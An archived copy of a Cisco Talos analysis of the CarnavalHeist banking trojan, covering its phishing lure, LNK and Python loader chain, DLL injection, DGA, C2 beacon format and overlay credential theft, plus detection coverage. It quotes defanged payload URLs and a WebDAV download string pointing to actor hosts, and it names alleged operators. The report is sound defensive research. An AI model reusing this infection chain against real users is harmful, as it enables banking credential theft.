{
	"id": "0e16147c-466c-4834-ba20-b247e8a95dbe",
	"created_at": "2026-04-06T00:09:09.676964Z",
	"updated_at": "2026-04-10T03:21:53.295715Z",
	"deleted_at": null,
	"sha1_hash": "70297aa9ff3a162bab859d804704af538fc62c3f",
	"title": "New banking trojan “CarnavalHeist” targets Brazil with overlay attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1492370,
	"plain_text": "New banking trojan “CarnavalHeist” targets Brazil with overlay\r\nattacks\r\nBy Cisco Talos\r\nPublished: 2024-05-31 · Archived: 2026-04-05 20:27:01 UTC\r\nSince February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new\r\nbanking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are\r\ncommon among other banking trojans coming out of Brazil. This family has also been referenced as AllaSenha\r\nin a recent report. \r\nTalos attributes with high confidence the development and operation of CarnavalHeist to Brazilian actors who\r\ncould be identified because of some operational mistakes made during the domain registration process for their\r\npayload-hosting sites. \r\nThe current campaign uses financial-related themes in spam emails, Delphi-based DLLs, overlay attack methods,\r\nand usual input capture techniques, such as keylogging and screen capture. There are also names of traditional\r\nBrazilian banks hardcoded in the malware.  \r\nUnique to CarnavalHeist, however, is the dynamic use of a Python-based loader as part of the DLL injection\r\nprocess and the specific targeting of banking desktop applications to enable tracking of other Brazilian financial\r\ninstitutions. \r\nCarnavalHeist has Brazilian origins \r\nTalos assesses with high confidence that the CarnavalHeist malware is of Brazilian origin and primarily targets\r\nBrazilian users based on our observations of the Portuguese language being used throughout all aspects of the infection\r\nchain and the malware itself, including the use of Brazilian slang to describe some bank names, and a notable lack of\r\nother language variants thus far. The command and control (C2) infrastructure exclusively uses the BrazilSouth\r\navailability zone on Microsoft Azure to control infected machines, and they specifically target prominent Brazilian\r\nfinancial institutions.  
\r\nWe further assess that the current wave of activity has been ongoing since the beginning of February based on the\r\nvolume and timeline of observable C2 domain activity, although we have observed related samples and variants that\r\nwere uploaded to VirusTotal in November and December 2023, indicating that the malware has been in development\r\nsince at least late 2023. As of May 2024, CarnavalHeist is still active, and our analysis remains ongoing as we continue\r\nto identify new samples. \r\nFinancial-themed spam as initial execution method \r\nCarnavalHeist infection begins with a financially themed unsolicited email using a fake invoice as a lure to get the user\r\nto open a malicious URL. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 1 of 17\n\nAn example unsolicited email distributing CarnavalHeist.\r\nThe malicious link uses the IS.GD URL shortener service to redirect users to the first-stage payload. The URL usually\r\nlooks similar to some of these examples: \r\nhttps://is[.]gd/38qeon?0177551.5510 \r\nhttps://is[.]gd/ROnj3W?0808482.5176 \r\nhttps://is[.]gd/a4dpQP?000324780473.85375532000 \r\nThis URL redirects the user to the server hosting the fake web page where the users are supposed to download their\r\ninvoice. We have observed different domains being used in this step, but all contain references to “Nota Fiscal\r\nEletrônica,” the Portuguese term for invoice. \r\nContent of website where user is redirected to download the malware. 
\r\nSome of the domains we observed being used to host these pages are: \r\nhttps://notafiscaleletronica[.]nf-e[.]pro/danfe/?notafiscal=00510242.500611 \r\nhttps://nota-fiscal[.]nfe-digital[.]top/nota-estadual/?notafiscal=00792011.977347 \r\nhttps://nfe-visualizer[.]app[.]br/notas/?notafiscal=000851113082.35493424000 \r\nThe download target is the final link in this step, and it uses WebDAV to download the next-stage payload: \r\nsearch:query=NotaFiscal.pdf\u0026crumb=location:\\\\4[.]203[.]105[.]118@80\\Documentos\u0026displayname=Downloads \r\nsearch:query=NotaFiscal.pdf\u0026crumb=location:\\\\191[.]233[.]248[.]170@80\\Documentos\u0026displayname=Downloads \r\nThis command ends up downloading a LNK file, which then executes the next stage of the infection. The LNK file’s\r\nmetadata illustrates a common method threat actors use to execute malicious scripts and commands. \r\nLNK metadata used in the CarnavalHeist campaign.\r\nThe command above attempts to hide the malicious execution from the unsuspecting user. First, the text “Visualizacao\r\nindisponivel” (Portuguese for “view unavailable”) is written to a file, “NotaFiscal.pdf,” to the user’s Downloads\r\ndirectory. The PDF is then opened for viewing, meant to fool the user into thinking an actual PDF was downloaded,\r\nwhile another cmd.exe process is started minimized, and the malicious component is run.  \r\nWe have also observed multiple MSI installer-based variants, whereby the MSI file replaces the role of the LNK file\r\nand subsequent batch file, picking up in the execution chain with a variant of the first-stage Python script. 
In many of\r\nthe earlier variants, the actor’s Python scripts were less refined and used lower-level C-types and a more obvious\r\ninvocation of “windll.kernel32” directly in the Python script to dynamically load downstream malicious DLLs, rather\r\nthan through the more obfuscated tool offered through the “pythonmemorymodule” package seen in the execution chain\r\nof the newer samples.  \r\nIdentifying the actors behind CarnavalHeist \r\nOur analysis of the different samples for CarnavalHeist has exposed the user account used on the system where some\r\nof the samples were compiled, in addition to a GitHub account referenced in the MSI variants that appears to have been\r\nhosting the loader and banking trojan payloads at one point.  \r\nIn examining the final payload, an assert statement within the code was flagged by the compiler and project metadata\r\nwas exposed as a result. The assert we observed exposed the directory path “C:\\Users\\bert1m\\Desktop\\Meu Drive”,\r\nwith “bert1m” being the active username during the payload’s compilation. The MSI variant also refers to a GitHub\r\naccount “marianaxx0492494,” which was being used as a remote host for the files: \r\ngithub[.]com/marianaxx0492494/update/raw/main/setup.msi \r\ngithub[.]com/marianaxx0492494/update/raw/main/Execute_dll.zip \r\nThese were presumably a copy of the MSI variant itself as well as a version of the loader DLL. However, at the time of our\r\ninvestigation, this user account had already been removed from GitHub, and we could not find verified samples of the\r\nfiles at those URLs. \r\nWhile this evidence by itself is not enough to identify specific actors, we found additional evidence of the actors’\r\nidentity behind the development and operation of this malware campaign. 
While examining the WHOIS information for\r\none of the domains hosting the initial infection, we noticed it exposed the full name and email address of the person\r\nregistering the domain.  \r\nWhois information for domain nfe-visualizer[.]app[.]br used to distribute CarnavalHeist.\r\nWe can see the username in their email is similar to the username used in the project path we have observed inside the\r\nbinary. Another important piece of information in this registry is the `ownerid`, which contains the CPF (“Cadastro de\r\nPessoa Física” or “Natural Person Registry”) of the person. The CPF works as a national ID in Brazil.  \r\nBy searching for this person’s name, we found a reference to a company where they were a partner, which lists part of\r\ntheir CPF above: \r\nBusiness association information for a company in Brazil showing part of the threat actor CPF.\r\nWe also found previous companies they owned in the Brazilian state of Maranhão: \r\nCompany owned by the threat actor associated with CarnavalHeist.\r\nAnother domain used to host the initial payload is also registered in Brazil and again exposes information about the\r\nowner. \r\nWhois information for a second threat actor associated with CarnavalHeist.\r\nFor this person it was easier to find more information based on their CPF, as they have criminal records, according to\r\nthe Brazilian judiciary service. \r\nCriminal records for threat actor associated with CarnavalHeist.\r\nBased on this information, Talos assesses with high confidence these two actors are behind the development and operation\r\nof the campaign distributing CarnavalHeist affecting Brazilian victims. 
\r\nAnalysis of batch file “a3.cmd” and Python loader \r\nThe file “a3.cmd” is a Windows batch file with several layers of simple encoding and obfuscation that serves as a\r\nwrapper for installing Python on the target environment and subsequently executing a Python script that handles\r\ninjecting the second-stage payload DLL.  \r\nBatch file used in the first stage of infection.\r\nThis first layer is decoded to another shell script which downloads a Python interpreter from the official Python FTP\r\nserver and installs to a malware-created folder. \r\nPowerShell script downloading and installing Python and subsequently running the malicious loader.\r\nAfter using the downloaded Python interpreter, the batch file executes an embedded base64-encoded Python script.\r\nDecoding the base64 string embedded in the Python command reveals the final component of the cascading commands\r\nto be a loader for injecting a malicious DLL.  \r\nPython script used to download and inject the malicious banking DLL.\r\nThe script checks the processor architecture from the registry key\r\n`HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0` and bails out if the processor name value is “Broadwell.” It\r\nthen uses the function `lk()` as a domain generation algorithm (DGA) to generate a fully qualified domain (FQDN)\r\nunder the BrazilSouth region in Azure, which will be used to download the malicious DLL from. We explain the process\r\nby which this domain is generated in a section below. \r\nOnce the correct FQDN has been generated, a TCP connection is opened. 
The script sends a UTF-8-encoded packet to\r\nthe actor’s Azure server in the format below, where the victim’s hostname, Windows version name and processor\r\narchitecture name are all passed as identifying markers: \r\n`pyCodeV1 - *NEW* {ss.gethostname()} | {Windows Product Name} | {Processor Architecture Name}` \r\nThe server then sends a response back with a byte stream containing a DLL payload named “executor.dll,” a second-stage Python script that will load the DLL and additional Python modules used to load the DLL. This data object is then\r\nreserialized within the parent Python script and executed as the next stage through Python’s `exec()` command. \r\nUsing CodePy for dynamic DLL execution \r\nThe byte stream contains a handful of components that are passed to the `exec()` command to set up the downstream\r\nexecution logic. On execution, CodePy first saves a copy of the previous Python script to the user’s public directory as\r\n“ps.txt”.\r\nNext, the script unpacks the “executor.dll” PE file and loads the resulting bytes buffer of the DLL dynamically into\r\nmemory through pythonmemorymodule’s `MemoryModule` class. Finally, the function entry point `Force` is called\r\nfrom `executor.dll` through the MemoryModule class function `get_proc_addr`. On execution, `Force` generates an up\r\nto 19-character randomized string using a similar character key string, as seen in the DGA function in the Python script.\r\n \r\nIt then selects a random directory from the system’s default user profile of the typical standard Windows folders. The\r\ninjector then checks if the system is running a 32- or 64-bit operating system and copies “mshta.exe” from the proper\r\n32-bit folder to the selected user folder, renamed with a random character string and an .exe extension.  \r\nFinally, the embedded payload, a UPX-packed banking trojan, is then extracted from a resource within executor.dll\r\nmarked as “RcDLL”. 
It is another Delphi-based DLL, named \"Access_PC_Client.dll\" in many of the observed samples.\r\nThe payload bytes are then written to a memory stream and injected into a spawned “mshta.exe” process.  \r\nResource present in the malicious loader DLL.\r\nFinal payload: Banking trojan DLL \r\nCarnavalHeist will attempt to steal the victim’s credentials for a variety of Brazilian financial institutions. This is\r\naccomplished through overlay attack methodologies, whereby an actor presents an overlaid window on top of the\r\nexpected legitimate application or service.  \r\nLike other Brazilian banking trojans, the malware monitors window title strings for specific word and pattern matches.\r\nWhen a window title matches, the malware sets the window to invisible and replaces it with a bundled overlay image\r\nfor the given organization. At the same time, a timer will attempt to open a new socket connection to an actor-controlled\r\nC2 using another DGA function to create a separate. This DGA is distinct from the one used by the Python loader script,\r\nalthough this DGA also uses a server hosted on the BrazilSouth resource region on Azure.  \r\nCarnavalHeist possesses numerous capture capabilities, commonly associated with banking trojans, which are either\r\nexecuted automatically once a matched bank is detected, or by receiving a command from the C2.  \r\nThe protocol is a customized version of publicly available code for a Delphi Remote Access Client, which is the same\r\nprotocol used by other banker families like Mekotio and Casbaneiro in the past. Luckily, these commands are not\r\nobfuscated and are exposed in the binary code. 
There is a single function processing all input from C2, and it translates\r\nto a series of IF/THEN structures for each command: \r\nSequence of commands being processed from C2 communication.\r\nThe code supports approximately 80 commands from the C2, including keyboard capture, screenshots, video capture\r\nand remote control. They also enable the attacker to trigger specific overlay attacks to steal the login information for the\r\nbanking institutions while the user interacts with the fake login screens.  \r\nThese commands sent from the C2 and responses from the malware are all sent unencrypted through a TCP connection\r\non a random port. The commands and responses are usually enclosed in the tags shown in the code. One example of this\r\nis how the malware answers when the C2 responds to the initial connection attempt: \r\n`\u003c|Info|\u003eBANK_NAME\u003c|\u003eWindows 10 Enterprise\u003c|\u003eDESKTOP-XXXXXXX\u003c|\u003eIntel(R) Xeon(R) W-2295 CPU @\r\n3.00GHz\u003c|\u003e\u003c\u003c|` \r\nThere are also functions present in the binary that deal with remote control capabilities using AnyDesk remote desktop,\r\nwhich allows the attacker to interact with the user machine during a banking session. Some of the commands accept\r\nadditional parameters like an IP/Port to be used for the video connection or the keyboard/clipboard interaction in case of\r\nremote access. \r\nCarnavalHeist can also capture and create QR codes on demand, which are used by many banks to allow users to log in\r\nand execute transactions. This enables the attacker to redirect transactions to accounts they control instead of the\r\naccounts the user intended. 
\r\nCode showing the creation of QR code to overlay on victim's banking session.\r\nCapturing mouse and keyboard events and their key translations would expose PINs and other similar tokens for these\r\nbanks, while potentially being able to “pass through” the sign out to the legitimate service underneath the overlay, much\r\nlike a skimmer on a credit card or ATM keypad. \r\nKeyboard overlay used to capture banking PIN.\r\nCarnavalHeist C2 protocol and DGA analysis \r\nCarnavalHeist uses different algorithms to generate the subdomains it uses to download payloads and communicate\r\nwith its C2 servers. These subdomains are all hosted under the BrazilSouth availability zone in Azure at “{dga}\r\n[.]brazilsouth[.]cloudapp[.]azure[.]com”.  \r\nThe DGA that generates the correct subdomains is contained within a function named `lk()` in the Python script.  \r\nFunctions implementing the DGA were used to download the banking trojan payload.\r\nIt first gets the current date and weekday values from the Python datetime module and adds their values together to\r\ngenerate an integer value. This value is used as an index to retrieve a character out of the hardcoded string\r\n`{abcdefghijlmnopqrstuvxzwkyjlmnopqabcghjl}`.  \r\nFive possible subdomain string choices are then generated and hashed by the SHA1 algorithm, followed by more string\r\nmanipulation until it is returned. A random entry from this list is then selected to generate the final FQDN. \r\nThen, a random TCP port is generated by the function `ptV5()` following a similar algorithm using the dates as a seed,\r\nand these parameters are passed to the `connect()` Python function.  
\r\nThe algorithm used by the malicious DLL to generate the subdomain used for C2 communication is also based on the\r\ncurrent date and time but adds additional seeds depending on which banks are currently being accessed by the victim,\r\nwhich could be either through a web browser or a custom banking desktop application used by some banks in Brazil.\r\nThese seed values are single-hex bytes associated with each bank: \r\nTarget bank 1: 0x55 \r\nSecondary targeted banks: 0x56 \r\nAll other financial institutions: 0x57 \r\nThe DGA will then select a starting letter for the subdomain based on an array of non-ordered alpha characters like in\r\nthe Python script. It then uses the integer representations of the current day of the week, month and year, as well as the\r\ncurrent month and week of the year, to generate separate additional parts of the subdomain string through several\r\narithmetic operations.  \r\nCarnavalHeist has likely been in active development since at least November of 2023, while significant in-the-wild\r\nactivity first began in February 2024. Based on the information we had about the DGA domains and activities\r\nperformed by the Python script, Talos discovered samples in VirusTotal and Talos telemetry dating back to November\r\n2023. \r\nTracing the DGA domains from the Python script and the final payload in our DNS telemetry, we first observed in-the-wild activity on Feb. 20, 2024, with more consistent activity ramping up beginning on Feb. 11, 2024. Additional\r\nvariants of the Python loader containing slight alterations to the DGA were observed further on in our investigation.\r\nTracing all the potential domains from all the DGA variations, we can observe initial visible activity beginning in\r\nFebruary with larger spikes in actor domain activity starting in late March to the present. 
\r\nDNS activity for the DGA domains used by CarnavalHeist.\r\nWe assess that the actor(s) behind CarnavalHeist are of low-to-moderate sophistication. There are some aspects of the\r\ncode and malware that hint at sophistication, whether borrowed or their own, but are then short circuited or made\r\npointless by mistakes or odd choices elsewhere. For example, the DGA algorithm for some of the Python cradles goes\r\nthrough the trouble of generating a list of five different potential subdomains to be used on any given day. The list of\r\nsubdomains is then referenced by Python’s random choice function, but the subdomain list is sliced in a way that only\r\nthe last option is ever used. This is then corrected to use all choices in another version of the Python script we observed.\r\nThe actor is worth monitoring, as the ability to incorporate complexity within their malware is more concerning than the\r\ninitially observed missteps, which can always be corrected in future development iterations. The number of additional\r\nvariants we observed also suggests that the author of CarnavalHeist is actively developing it. \r\nTalos is continuing to monitor developments and analyze additional related samples and infrastructure to this actor and\r\ncampaign. 
\r\nMITRE ATT\u0026CK \r\nTactic  Technique \r\nInitial Access  T1566.001: Phishing: Spearphishing Attachment \r\nExecution  T1059.001: Command and Scripting Interpreter: PowerShell \r\nExecution  T1059.003: Command and Scripting Interpreter: Windows Command Shell \r\nExecution  T1059.006: Command and Scripting Interpreter: Python \r\nPersistence  T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder \r\nPrivilege Escalation  T1055.001: Process Injection: Dynamic-link Library Injection \r\nDefense Evasion  T1027.010: Obfuscated Files or Information: Command Obfuscation \r\nDefense Evasion  T1027.012: Obfuscated Files or Information: LNK Icon Smuggling \r\nDefense Evasion  T1027.009: Obfuscated Files or Information: Embedded Payloads \r\nDefense Evasion  T1036.008: Masquerading: Masquerade File Type \r\nCredential Access  T1056.001: Input Capture: Keylogging \r\nCredential Access  T1056.002: Input Capture: GUI Input Capture \r\nDiscovery  T1010: Application Window Discovery \r\nDiscovery  T1082: System Information Discovery \r\nLateral Movement  T1570: Lateral Tool Transfer \r\nCollection  T1113: Screen Capture \r\nCollection  T1125: Video Capture \r\nCommand and Control  T1102: Web Service \r\nCommand and Control  T1102.002: Web Service: Bidirectional Communication \r\nCommand and Control  T1104: Multi-Stage Channels \r\nCommand and Control  T1105: Ingress Tool Transfer \r\nCommand and Control  T1568.002: Dynamic Resolution: Domain Generation Algorithms \r\nCommand and Control  T1571: Non-Standard Port \r\nExfiltration  T1020: Automated Exfiltration \r\nExfiltration  T1041: Exfiltration Over C2 Channel \r\nExfiltration  T1567: Exfiltration Over Web Service \r\nCoverage \r\nWays our customers can detect and block this threat are listed 
below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed\r\nin this post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts. \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org. \r\nThe following Snort SIDs are applicable to this threat: 63515, 63516, 63517, 63518 and 300922. 
\r\n The following ClamAV detections are also available for this threat: \r\nWin.Trojan.CarnavalHeist-10029766-0 \r\nLnk.Downloader.CarnavalHeist-10029991-0 \r\nWin.Dropper.CarnavalHeist-10029449-0 \r\nWin.Loader.CarnavalHeist-10029772-0 \r\nIndicators of Compromise \r\nIndicators of Compromise associated with this threat can be found here. \r\nSource: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/"
	],
	"report_names": [
		"new-banking-trojan-carnavalheist-targets-brazil"
	],
	"threat_actors": [],
	"ts_created_at": 1775434149,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.pdf",
		"text": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.txt",
		"img": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.jpg"
	}
}